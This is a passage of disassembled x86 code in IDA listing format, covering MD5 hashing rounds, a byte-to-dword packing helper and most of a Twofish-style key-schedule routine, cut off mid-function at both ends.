shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_4]
mov [ebp+var_10], edx
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov edx, [ebp+var_4]
xor edx, ecx
add edx, [ebp+var_28]
mov eax, [ebp+var_C]
lea ecx, [eax+edx-100B83h]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
shl edx, 0Fh
mov eax, [ebp+var_C]
shr eax, 11h
or edx, eax
mov [ebp+var_C], edx
mov ecx, [ebp+var_C]
add ecx, [ebp+var_10]
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
not edx
mov eax, [ebp+var_C]
or eax, edx
mov ecx, [ebp+var_10]
xor ecx, eax
add ecx, [ebp+var_4C]
mov edx, [ebp+var_8]
lea eax, [edx+ecx-7A7BA22Fh]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
shl ecx, 15h
mov edx, [ebp+var_8]
shr edx, 0Bh
or ecx, edx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov ecx, [ebp+var_10]
not ecx
mov edx, [ebp+var_8]
or edx, ecx
mov eax, [ebp+var_C]
xor eax, edx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea edx, [ecx+eax+6FA87E4Fh]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
add edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov edx, [ebp+var_8]
xor edx, ecx
add edx, [ebp+var_14]
mov eax, [ebp+var_10]
lea ecx, [eax+edx-1D31920h]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
shl edx, 0Ah
mov eax, [ebp+var_10]
shr eax, 16h
or edx, eax
mov [ebp+var_10], edx
mov ecx, [ebp+var_10]
add ecx, [ebp+var_4]
mov [ebp+var_10], ecx
mov edx, [ebp+var_8]
not edx
mov eax, [ebp+var_10]
or eax, edx
mov ecx, [ebp+var_4]
xor ecx, eax
add ecx, [ebp+var_38]
mov edx, [ebp+var_C]
lea eax, [edx+ecx-5CFEBCECh]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
shl ecx, 0Fh
mov edx, [ebp+var_C]
shr edx, 11h
or ecx, edx
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
not ecx
mov edx, [ebp+var_C]
or edx, ecx
mov eax, [ebp+var_10]
xor eax, edx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax+4E0811A1h]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov edx, [ebp+var_8]
add edx, [ebp+var_C]
mov [ebp+var_8], edx
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov edx, [ebp+var_C]
xor edx, ecx
add edx, [ebp+var_40]
mov eax, [ebp+var_4]
lea ecx, [eax+edx-8AC817Eh]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
shl edx, 6
mov eax, [ebp+var_4]
shr eax, 1Ah
or edx, eax
mov [ebp+var_4], edx
mov ecx, [ebp+var_4]
add ecx, [ebp+var_8]
mov [ebp+var_4], ecx
mov edx, [ebp+var_C]
not edx
mov eax, [ebp+var_4]
or eax, edx
mov ecx, [ebp+var_8]
xor ecx, eax
add ecx, [ebp+var_24]
mov edx, [ebp+var_10]
lea eax, [edx+ecx-42C50DCBh]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
shl ecx, 0Ah
mov edx, [ebp+var_10]
shr edx, 16h
or ecx, edx
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov ecx, [ebp+var_8]
not ecx
mov edx, [ebp+var_10]
or edx, ecx
mov eax, [ebp+var_4]
xor eax, edx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea edx, [ecx+eax+2AD7D2BBh]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
add edx, [ebp+var_10]
mov [ebp+var_C], edx
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov edx, [ebp+var_10]
xor edx, ecx
add edx, [ebp+var_2C]
mov eax, [ebp+var_8]
lea ecx, [eax+edx-14792C6Fh]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
shl edx, 15h
mov eax, [ebp+var_8]
shr eax, 0Bh
or edx, eax
mov [ebp+var_8], edx
mov ecx, [ebp+var_8]
add ecx, [ebp+var_C]
mov [ebp+var_8], ecx
mov edx, [ebp+var_54]
mov eax, [edx]
add eax, [ebp+var_4]
mov ecx, [ebp+var_54]
mov [ecx], eax
mov edx, [ebp+var_54]
mov eax, [edx+4]
add eax, [ebp+var_8]
mov ecx, [ebp+var_54]
mov [ecx+4], eax
mov edx, [ebp+var_54]
mov eax, [edx+8]
add eax, [ebp+var_C]
mov ecx, [ebp+var_54]
mov [ecx+8], eax
mov edx, [ebp+var_54]
mov eax, [edx+0Ch]
add eax, [ebp+var_10]
mov ecx, [ebp+var_54]
mov [ecx+0Ch], eax
mov ecx, 10h
xor eax, eax
lea edi, [ebp+var_50]
rep stosd
pop edi
mov esp, ebp
pop ebp
retn
sub_40B215 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C0BD proc near ; CODE XREF: sub_40B215+38�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], edx
mov [ebp+var_C], ecx
mov [ebp+var_4], 0
mov [ebp+var_8], 0
jmp short loc_40C0EB
; ---------------------------------------------------------------------------
loc_40C0D9: ; CODE XREF: sub_40C0BD+79�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, 4
mov [ebp+var_8], ecx
loc_40C0EB: ; CODE XREF: sub_40C0BD+1A�j
mov edx, [ebp+var_8]
cmp edx, [ebp+arg_0]
jnb short loc_40C138
mov eax, [ebp+var_10]
add eax, [ebp+var_8]
xor ecx, ecx
mov cl, [eax]
mov edx, [ebp+var_10]
add edx, [ebp+var_8]
xor eax, eax
mov al, [edx+1]
shl eax, 8
or ecx, eax
mov edx, [ebp+var_10]
add edx, [ebp+var_8]
xor eax, eax
mov al, [edx+2]
shl eax, 10h
or ecx, eax
mov edx, [ebp+var_10]
add edx, [ebp+var_8]
xor eax, eax
mov al, [edx+3]
shl eax, 18h
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_C]
mov [eax+edx*4], ecx
jmp short loc_40C0D9
; ---------------------------------------------------------------------------
loc_40C138: ; CODE XREF: sub_40C0BD+34�j
mov esp, ebp
pop ebp
retn 4
sub_40C0BD endp
; ---------------------------------------------------------------------------
dw 0CCCCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C140 proc near ; CODE XREF: sub_40A350+48�p
; rdata:0040A414�p ...
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = byte ptr -22Ch
var_22B = byte ptr -22Bh
var_12C = byte ptr -12Ch
var_12B = byte ptr -12Bh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 2B8h
mov [ebp+var_2AC], ecx
mov [ebp+var_18], 0
mov [ebp+var_1C], 0
cmp dword_418DD0, 0
jz short loc_40C16B
call sub_40D540
loc_40C16B: ; CODE XREF: sub_40C140+24�j
mov eax, [ebp+var_2AC]
mov ecx, [eax+4Dh]
lea edx, [ecx+ecx+8]
mov [ebp+var_250], edx
mov eax, [ebp+var_2AC]
mov ecx, [eax+1]
mov [ebp+var_230], ecx
mov eax, [ebp+var_230]
add eax, 3Fh
cdq
and edx, 3Fh
add eax, edx
sar eax, 6
mov [ebp+var_234], eax
mov [ebp+var_238], 0
mov edx, [ebp+var_234]
sub edx, 1
mov [ebp+var_23C], edx
jmp short loc_40C1DE
; ---------------------------------------------------------------------------
loc_40C1C0: ; CODE XREF: sub_40C140+131�j
mov eax, [ebp+var_238]
add eax, 1
mov [ebp+var_238], eax
mov ecx, [ebp+var_23C]
sub ecx, 1
mov [ebp+var_23C], ecx
loc_40C1DE: ; CODE XREF: sub_40C140+7E�j
mov edx, [ebp+var_238]
cmp edx, [ebp+var_234]
jge loc_40C276
mov eax, [ebp+var_238]
shl eax, 1
mov ecx, [ebp+var_238]
mov edx, [ebp+var_2AC]
mov eax, [edx+eax*4+51h]
mov [ebp+ecx*4+var_2C], eax
mov ecx, [ebp+var_238]
shl ecx, 1
mov edx, [ebp+var_238]
mov eax, [ebp+var_2AC]
mov ecx, [eax+ecx*4+55h]
mov [ebp+edx*4+var_24C], ecx
mov edx, [ebp+var_238]
mov edx, [ebp+edx*4+var_24C]
mov eax, [ebp+var_238]
mov ecx, [ebp+eax*4+var_2C]
call sub_40D785
mov ecx, [ebp+var_23C]
mov edx, [ebp+var_2AC]
mov [edx+ecx*4+71h], eax
mov eax, [ebp+var_23C]
mov ecx, [ebp+var_23C]
mov edx, [ebp+var_2AC]
mov ecx, [edx+ecx*4+71h]
mov [ebp+eax*4+var_10], ecx
jmp loc_40C1C0
; ---------------------------------------------------------------------------
loc_40C276: ; CODE XREF: sub_40C140+AA�j
mov [ebp+var_14], 0
mov edx, [ebp+var_14]
mov [ebp+var_238], edx
jmp short loc_40C2A3
; ---------------------------------------------------------------------------
loc_40C288: ; CODE XREF: sub_40C140+683�j
mov eax, [ebp+var_238]
add eax, 1
mov [ebp+var_238], eax
mov ecx, [ebp+var_14]
add ecx, 2020202h
mov [ebp+var_14], ecx
loc_40C2A3: ; CODE XREF: sub_40C140+146�j
mov eax, [ebp+var_250]
cdq
sub eax, edx
sar eax, 1
cmp [ebp+var_238], eax
jge loc_40C7C8
mov edx, [ebp+var_14]
mov [ebp+var_254], edx
mov eax, [ebp+var_234]
and eax, 3
mov [ebp+var_2B0], eax
cmp [ebp+var_2B0], 0
jz short loc_40C2FA
cmp [ebp+var_2B0], 2
jz loc_40C41A
cmp [ebp+var_2B0], 3
jz loc_40C38A
jmp loc_40C4FC
; ---------------------------------------------------------------------------
loc_40C2FA: ; CODE XREF: sub_40C140+199�j
mov ecx, [ebp+var_254]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418CD0[ecx]
mov eax, [ebp+var_20]
and eax, 0FFh
xor edx, eax
mov byte ptr [ebp+var_254], dl
mov ecx, [ebp+var_254+1]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418BD0[ecx]
mov eax, [ebp+var_20+1]
and eax, 0FFh
xor edx, eax
mov byte ptr [ebp+var_254+1], dl
mov ecx, [ebp+var_254+2]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418BD0[ecx]
mov eax, [ebp+var_20+2]
and eax, 0FFh
xor edx, eax
mov byte ptr [ebp+var_254+2], dl
mov ecx, [ebp+var_254+3]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418CD0[ecx]
mov eax, [ebp+var_20+3]
and eax, 0FFh
xor edx, eax
mov byte ptr [ebp+var_254+3], dl
loc_40C38A: ; CODE XREF: sub_40C140+1AF�j
mov ecx, [ebp+var_254]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418CD0[ecx]
mov eax, [ebp+var_24]
and eax, 0FFh
xor edx, eax
mov byte ptr [ebp+var_254], dl
mov ecx, [ebp+var_254+1]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418CD0[ecx]
mov eax, [ebp+var_24+1]
and eax, 0FFh
xor edx, eax
mov byte ptr [ebp+var_254+1], dl
mov ecx, [ebp+var_254+2]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418BD0[ecx]
mov eax, [ebp+var_24+2]
and eax, 0FFh
xor edx, eax
mov byte ptr [ebp+var_254+2], dl
mov ecx, [ebp+var_254+3]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418BD0[ecx]
mov eax, [ebp+var_24+3]
and eax, 0FFh
xor edx, eax
mov byte ptr [ebp+var_254+3], dl
loc_40C41A: ; CODE XREF: sub_40C140+1A2�j
mov ecx, [ebp+var_254]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418BD0[ecx]
mov eax, [ebp+var_28]
and eax, 0FFh
xor edx, eax
xor ecx, ecx
mov cl, byte_418BD0[edx]
mov edx, [ebp+var_2C]
and edx, 0FFh
xor ecx, edx
mov eax, [ebp+var_254+1]
and eax, 0FFh
xor edx, edx
mov dl, byte_418CD0[eax]
mov eax, [ebp+var_28+1]
and eax, 0FFh
xor edx, eax
xor eax, eax
mov al, byte_418BD0[edx]
mov edx, [ebp+var_2C+1]
and edx, 0FFh
xor eax, edx
mov ecx, dword_418DD4[ecx*4]
xor ecx, dword_4191D4[eax*4]
mov edx, [ebp+var_254+2]
and edx, 0FFh
xor eax, eax
mov al, byte_418BD0[edx]
mov edx, [ebp+var_28+2]
and edx, 0FFh
xor eax, edx
xor edx, edx
mov dl, byte_418CD0[eax]
mov eax, [ebp+var_2C+2]
and eax, 0FFh
xor edx, eax
xor ecx, dword_4195D4[edx*4]
mov edx, [ebp+var_254+3]
and edx, 0FFh
xor eax, eax
mov al, byte_418CD0[edx]
mov edx, [ebp+var_28+3]
and edx, 0FFh
xor eax, edx
xor edx, edx
mov dl, byte_418CD0[eax]
mov eax, [ebp+var_2C+3]
and eax, 0FFh
xor edx, eax
xor ecx, dword_4199D4[edx*4]
mov [ebp+var_18], ecx
loc_40C4FC: ; CODE XREF: sub_40C140+1B5�j
mov ecx, [ebp+var_14]
add ecx, 1010101h
mov [ebp+var_258], ecx
mov edx, [ebp+var_234]
and edx, 3
mov [ebp+var_2B4], edx
cmp [ebp+var_2B4], 0
jz short loc_40C542
cmp [ebp+var_2B4], 2
jz loc_40C67A
cmp [ebp+var_2B4], 3
jz loc_40C5DE
jmp loc_40C778
; ---------------------------------------------------------------------------
loc_40C542: ; CODE XREF: sub_40C140+3E1�j
mov eax, [ebp+var_258]
and eax, 0FFh
xor ecx, ecx
mov cl, byte_418CD0[eax]
mov edx, [ebp+var_240]
and edx, 0FFh
xor ecx, edx
mov byte ptr [ebp+var_258], cl
mov eax, [ebp+var_258+1]
and eax, 0FFh
xor ecx, ecx
mov cl, byte_418BD0[eax]
mov edx, [ebp+var_240+1]
and edx, 0FFh
xor ecx, edx
mov byte ptr [ebp+var_258+1], cl
mov eax, [ebp+var_258+2]
and eax, 0FFh
xor ecx, ecx
mov cl, byte_418BD0[eax]
mov edx, [ebp+var_240+2]
and edx, 0FFh
xor ecx, edx
mov byte ptr [ebp+var_258+2], cl
mov eax, [ebp+var_258+3]
and eax, 0FFh
xor ecx, ecx
mov cl, byte_418CD0[eax]
mov edx, [ebp+var_240+3]
and edx, 0FFh
xor ecx, edx
mov byte ptr [ebp+var_258+3], cl
loc_40C5DE: ; CODE XREF: sub_40C140+3F7�j
mov eax, [ebp+var_258]
and eax, 0FFh
xor ecx, ecx
mov cl, byte_418CD0[eax]
mov edx, [ebp+var_244]
and edx, 0FFh
xor ecx, edx
mov byte ptr [ebp+var_258], cl
mov eax, [ebp+var_258+1]
and eax, 0FFh
xor ecx, ecx
mov cl, byte_418CD0[eax]
mov edx, [ebp+var_244+1]
and edx, 0FFh
xor ecx, edx
mov byte ptr [ebp+var_258+1], cl
mov eax, [ebp+var_258+2]
and eax, 0FFh
xor ecx, ecx
mov cl, byte_418BD0[eax]
mov edx, [ebp+var_244+2]
and edx, 0FFh
xor ecx, edx
mov byte ptr [ebp+var_258+2], cl
mov eax, [ebp+var_258+3]
and eax, 0FFh
xor ecx, ecx
mov cl, byte_418BD0[eax]
mov edx, [ebp+var_244+3]
and edx, 0FFh
xor ecx, edx
mov byte ptr [ebp+var_258+3], cl
loc_40C67A: ; CODE XREF: sub_40C140+3EA�j
mov eax, [ebp+var_258]
and eax, 0FFh
xor ecx, ecx
mov cl, byte_418BD0[eax]
mov edx, [ebp+var_248]
and edx, 0FFh
xor ecx, edx
xor eax, eax
mov al, byte_418BD0[ecx]
mov ecx, [ebp+var_24C]
and ecx, 0FFh
xor eax, ecx
mov edx, [ebp+var_258+1]
and edx, 0FFh
xor ecx, ecx
mov cl, byte_418CD0[edx]
mov edx, [ebp+var_248+1]
and edx, 0FFh
xor ecx, edx
xor edx, edx
mov dl, byte_418BD0[ecx]
mov ecx, [ebp+var_24C+1]
and ecx, 0FFh
xor edx, ecx
mov eax, dword_418DD4[eax*4]
xor eax, dword_4191D4[edx*4]
mov ecx, [ebp+var_258+2]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418BD0[ecx]
mov ecx, [ebp+var_248+2]
and ecx, 0FFh
xor edx, ecx
xor ecx, ecx
mov cl, byte_418CD0[edx]
mov edx, [ebp+var_24C+2]
and edx, 0FFh
xor ecx, edx
xor eax, dword_4195D4[ecx*4]
mov ecx, [ebp+var_258+3]
and ecx, 0FFh
xor edx, edx
mov dl, byte_418CD0[ecx]
mov ecx, [ebp+var_248+3]
and ecx, 0FFh
xor edx, ecx
xor ecx, ecx
mov cl, byte_418CD0[edx]
mov edx, [ebp+var_24C+3]
and edx, 0FFh
xor ecx, edx
xor eax, dword_4199D4[ecx*4]
mov [ebp+var_1C], eax
loc_40C778: ; CODE XREF: sub_40C140+3FD�j
mov eax, [ebp+var_1C]
rol eax, 8
mov [ebp+var_1C], eax
mov ecx, [ebp+var_18]
add ecx, [ebp+var_1C]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov [eax+edx*4+81h], ecx
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_18]
lea eax, [edx+ecx*2]
mov [ebp+var_1C], eax
mov ecx, [ebp+var_1C]
rol ecx, 9
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov [eax+edx*4+85h], ecx
jmp loc_40C288
; ---------------------------------------------------------------------------
loc_40C7C8: ; CODE XREF: sub_40C140+174�j
mov ecx, [ebp+var_230]
mov [ebp+var_2B8], ecx
cmp [ebp+var_2B8], 80h
jz short loc_40C805
cmp [ebp+var_2B8], 0C0h
jz loc_40CB0A
cmp [ebp+var_2B8], 100h
jz loc_40CECB
jmp loc_40D491
; ---------------------------------------------------------------------------
loc_40C805: ; CODE XREF: sub_40C140+69E�j
mov dl, byte ptr [ebp+var_C]
push edx
mov edx, offset byte_418BD0
lea ecx, [ebp+var_12C]
call sub_40D88C
mov eax, [ebp+var_10]
and eax, 0FFh
mov [ebp+var_25C], eax
mov [ebp+var_238], 0
jmp short loc_40C842
; ---------------------------------------------------------------------------
loc_40C833: ; CODE XREF: sub_40C140+780�j
mov ecx, [ebp+var_238]
add ecx, 2
mov [ebp+var_238], ecx
loc_40C842: ; CODE XREF: sub_40C140+6F1�j
cmp [ebp+var_238], 100h
jge short loc_40C8C5
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12C]
xor ecx, ecx
mov cl, byte_418BD0[eax]
xor ecx, [ebp+var_25C]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_418DD4[ecx*4]
mov [eax+edx*4+121h], ecx
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12B]
xor ecx, ecx
mov cl, byte_418BD0[eax]
xor ecx, [ebp+var_25C]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_418DD4[ecx*4]
mov [eax+edx*4+129h], ecx
jmp loc_40C833
; ---------------------------------------------------------------------------
loc_40C8C5: ; CODE XREF: sub_40C140+70C�j
mov dl, byte ptr [ebp+var_C+1]
push edx
mov edx, offset byte_418CD0
lea ecx, [ebp+var_12C]
call sub_40D88C
mov eax, [ebp+var_10+1]
and eax, 0FFh
mov [ebp+var_260], eax
mov [ebp+var_238], 0
jmp short loc_40C902
; ---------------------------------------------------------------------------
loc_40C8F3: ; CODE XREF: sub_40C140+840�j
mov ecx, [ebp+var_238]
add ecx, 2
mov [ebp+var_238], ecx
loc_40C902: ; CODE XREF: sub_40C140+7B1�j
cmp [ebp+var_238], 100h
jge short loc_40C985
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12C]
xor ecx, ecx
mov cl, byte_418BD0[eax]
xor ecx, [ebp+var_260]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4191D4[ecx*4]
mov [eax+edx*4+125h], ecx
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12B]
xor ecx, ecx
mov cl, byte_418BD0[eax]
xor ecx, [ebp+var_260]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4191D4[ecx*4]
mov [eax+edx*4+12Dh], ecx
jmp loc_40C8F3
; ---------------------------------------------------------------------------
loc_40C985: ; CODE XREF: sub_40C140+7CC�j
mov dl, byte ptr [ebp+var_C+2]
push edx
mov edx, offset byte_418BD0
lea ecx, [ebp+var_12C]
call sub_40D88C
mov eax, [ebp+var_10+2]
and eax, 0FFh
mov [ebp+var_264], eax
mov [ebp+var_238], 0
jmp short loc_40C9C2
; ---------------------------------------------------------------------------
loc_40C9B3: ; CODE XREF: sub_40C140+900�j
mov ecx, [ebp+var_238]
add ecx, 2
mov [ebp+var_238], ecx
loc_40C9C2: ; CODE XREF: sub_40C140+871�j
cmp [ebp+var_238], 100h
jge short loc_40CA45
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12C]
xor ecx, ecx
mov cl, byte_418CD0[eax]
xor ecx, [ebp+var_264]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4195D4[ecx*4]
mov [eax+edx*4+921h], ecx
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12B]
xor ecx, ecx
mov cl, byte_418CD0[eax]
xor ecx, [ebp+var_264]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4195D4[ecx*4]
mov [eax+edx*4+929h], ecx
jmp loc_40C9B3
; ---------------------------------------------------------------------------
loc_40CA45: ; CODE XREF: sub_40C140+88C�j
mov dl, byte ptr [ebp+var_C+3]
push edx
mov edx, offset byte_418CD0
lea ecx, [ebp+var_12C]
call sub_40D88C
mov eax, [ebp+var_10+3]
and eax, 0FFh
mov [ebp+var_268], eax
mov [ebp+var_238], 0
jmp short loc_40CA82
; ---------------------------------------------------------------------------
loc_40CA73: ; CODE XREF: sub_40C140+9C0�j
mov ecx, [ebp+var_238]
add ecx, 2
mov [ebp+var_238], ecx
loc_40CA82: ; CODE XREF: sub_40C140+931�j
cmp [ebp+var_238], 100h
jge short loc_40CB05
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12C]
xor ecx, ecx
mov cl, byte_418CD0[eax]
xor ecx, [ebp+var_268]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4199D4[ecx*4]
mov [eax+edx*4+925h], ecx
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12B]
xor ecx, ecx
mov cl, byte_418CD0[eax]
xor ecx, [ebp+var_268]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4199D4[ecx*4]
mov [eax+edx*4+92Dh], ecx
jmp loc_40CA73
; ---------------------------------------------------------------------------
loc_40CB05: ; CODE XREF: sub_40C140+94C�j
jmp loc_40D491
; ---------------------------------------------------------------------------
loc_40CB0A: ; CODE XREF: sub_40C140+6AA�j
mov dl, [ebp+var_8]
push edx
mov edx, offset byte_418CD0
lea ecx, [ebp+var_12C]
call sub_40D88C
mov eax, [ebp+var_10]
and eax, 0FFh
mov [ebp+var_26C], eax
mov ecx, [ebp+var_C]
and ecx, 0FFh
mov [ebp+var_270], ecx
mov [ebp+var_238], 0
jmp short loc_40CB56
; ---------------------------------------------------------------------------
loc_40CB47: ; CODE XREF: sub_40C140+AB4�j
mov edx, [ebp+var_238]
add edx, 2
mov [ebp+var_238], edx
loc_40CB56: ; CODE XREF: sub_40C140+A05�j
cmp [ebp+var_238], 100h
jge loc_40CBF9
mov eax, [ebp+var_238]
xor ecx, ecx
mov cl, [ebp+eax+var_12C]
xor edx, edx
mov dl, byte_418BD0[ecx]
xor edx, [ebp+var_270]
xor eax, eax
mov al, byte_418BD0[edx]
xor eax, [ebp+var_26C]
mov ecx, [ebp+var_238]
shl ecx, 1
mov edx, [ebp+var_2AC]
mov eax, dword_418DD4[eax*4]
mov [edx+ecx*4+121h], eax
mov ecx, [ebp+var_238]
xor edx, edx
mov dl, [ebp+ecx+var_12B]
xor eax, eax
mov al, byte_418BD0[edx]
xor eax, [ebp+var_270]
xor ecx, ecx
mov cl, byte_418BD0[eax]
xor ecx, [ebp+var_26C]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_418DD4[ecx*4]
mov [eax+edx*4+129h], ecx
jmp loc_40CB47
; ---------------------------------------------------------------------------
loc_40CBF9: ; CODE XREF: sub_40C140+A20�j
mov dl, [ebp+var_7]
push edx
mov edx, offset byte_418CD0
lea ecx, [ebp+var_12C]
call sub_40D88C
mov eax, [ebp+var_10+1]
and eax, 0FFh
mov [ebp+var_274], eax
mov ecx, [ebp+var_C+1]
and ecx, 0FFh
mov [ebp+var_278], ecx
mov [ebp+var_238], 0
jmp short loc_40CC45
; ---------------------------------------------------------------------------
loc_40CC36: ; CODE XREF: sub_40C140+BA3�j
mov edx, [ebp+var_238]
add edx, 2
mov [ebp+var_238], edx
loc_40CC45: ; CODE XREF: sub_40C140+AF4�j
cmp [ebp+var_238], 100h
jge loc_40CCE8
mov eax, [ebp+var_238]
xor ecx, ecx
mov cl, [ebp+eax+var_12C]
xor edx, edx
mov dl, byte_418CD0[ecx]
xor edx, [ebp+var_278]
xor eax, eax
mov al, byte_418BD0[edx]
xor eax, [ebp+var_274]
mov ecx, [ebp+var_238]
shl ecx, 1
mov edx, [ebp+var_2AC]
mov eax, dword_4191D4[eax*4]
mov [edx+ecx*4+125h], eax
mov ecx, [ebp+var_238]
xor edx, edx
mov dl, [ebp+ecx+var_12B]
xor eax, eax
mov al, byte_418CD0[edx]
xor eax, [ebp+var_278]
xor ecx, ecx
mov cl, byte_418BD0[eax]
xor ecx, [ebp+var_274]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4191D4[ecx*4]
mov [eax+edx*4+12Dh], ecx
jmp loc_40CC36
; ---------------------------------------------------------------------------
loc_40CCE8: ; CODE XREF: sub_40C140+B0F�j
mov dl, [ebp+var_6]
push edx
mov edx, offset byte_418BD0
lea ecx, [ebp+var_12C]
call sub_40D88C
mov eax, [ebp+var_10+2]
and eax, 0FFh
mov [ebp+var_27C], eax
mov ecx, [ebp+var_C+2]
and ecx, 0FFh
mov [ebp+var_280], ecx
mov [ebp+var_238], 0
jmp short loc_40CD34
; ---------------------------------------------------------------------------
loc_40CD25: ; CODE XREF: sub_40C140+C92�j
mov edx, [ebp+var_238]
add edx, 2
mov [ebp+var_238], edx
loc_40CD34: ; CODE XREF: sub_40C140+BE3�j
cmp [ebp+var_238], 100h
jge loc_40CDD7
mov eax, [ebp+var_238]
xor ecx, ecx
mov cl, [ebp+eax+var_12C]
xor edx, edx
mov dl, byte_418BD0[ecx]
xor edx, [ebp+var_280]
xor eax, eax
mov al, byte_418CD0[edx]
xor eax, [ebp+var_27C]
mov ecx, [ebp+var_238]
shl ecx, 1
mov edx, [ebp+var_2AC]
mov eax, dword_4195D4[eax*4]
mov [edx+ecx*4+921h], eax
mov ecx, [ebp+var_238]
xor edx, edx
